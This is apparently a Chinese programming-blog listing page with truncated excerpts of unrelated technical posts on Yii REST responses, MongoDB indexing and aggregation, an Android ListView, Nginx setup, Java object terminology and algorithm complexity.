      响应格式 当处理一个 RESTful API 请求时, 一个应用程序通常需要如下步骤 来处理响应格式: 确定可能影响响应格式的各种因素, 例如媒介类型, 语言, 版本, 等等。 这个过程也被称为 content negotiation。 资源对象转换为数组, 如在 Resources 部分中所描述的。 通过 [[yii\rest\Serializer]]
    • MongoDB索引调优(2)——[十] eksliang mongodbMongoDB索引优化
      转载请出自出处:http://eksliang.iteye.com/blog/2178555 一、概述       上一篇文档中也说明了,MongoDB的索引几乎与关系型数据库的索引一模一样,优化关系型数据库的技巧通用适合MongoDB,所有这里只讲MongoDB需要注意的地方 二、索引内嵌文档     可以在嵌套文档的键上建立索引,方式与正常
    • 当滑动到顶部和底部时,实现Item的分离效果的ListView gundumw100 android
      拉动ListView,Item之间的间距会变大,释放后恢复原样; package cn.tangdada.tangbang.widget; import android.annotation.TargetApi; import android.content.Context; import android.content.res.TypedArray; import andr
    • 程序员用HTML5制作的爱心树表白动画 ini JavaScriptjqueryWebhtml5css
      体验效果:http://keleyi.com/keleyi/phtml/html5/31.htmHTML代码如下: <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"><head><meta charset="UTF-8" > <ti
    • 预装windows 8 系统GPT模式的ThinkPad T440改装64位 windows 7旗舰版 kakajw ThinkPad预装改装windows 7windows 8
        该教程具有普遍参考性,特别适用于联想的机器,其他品牌机器的处理过程也大同小异。 该教程是个人多次尝试和总结的结果,实用性强,推荐给需要的人!   缘由 小弟最近入手笔记本ThinkPad T440,但是特别不能习惯笔记本出厂预装的Windows 8系统,而且厂商自作聪明地预装了一堆没用的应用软件,消耗不少的系统资源(本本的内存为4G,系统启动完成时,物理内存占用比
    • Nginx学习笔记 mcj8089 nginx
      一、安装nginx             1、在nginx官方网站下载一个包,下载地址是:  http://nginx.org/download/nginx-1.4.2.tar.gz      2、WinSCP(ftp上传工
    • mongodb 聚合查询每天论坛链接点击次数 qiaolevip 每天进步一点点学习永无止境mongodb纵观千象
      /* 18 */ { "_id" : ObjectId("5596414cbe4d73a327e50274"), "msgType" : "text", "sendTime" : ISODate("2015-07-03T08:01:16.000Z"
    • java术语(PO/POJO/VO/BO/DAO/DTO) Luob. DAOPOJODTOpoVO BO
      PO(persistant object) 持久对象 在o/r 映射的时候出现的概念,如果没有o/r映射,就没有这个概念存在了.通常对应数据模型(数据库),本身还有部分业务逻辑的处理.可以看成是与数据库中的表相映射的java对象.最简单的PO就是对应数据库中某个表中的一条记录,多个记录可以用PO的集合.PO中应该不包含任何对数据库的操作. VO(value object) 值对象 通
    • 算法复杂度 Wuaner Algorithm
      Time Complexity & Big-O: http://stackoverflow.com/questions/487258/plain-english-explanation-of-big-o http://bigocheatsheet.com/ http://www.sitepoint.com/time-complexity-algorithms/
    按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他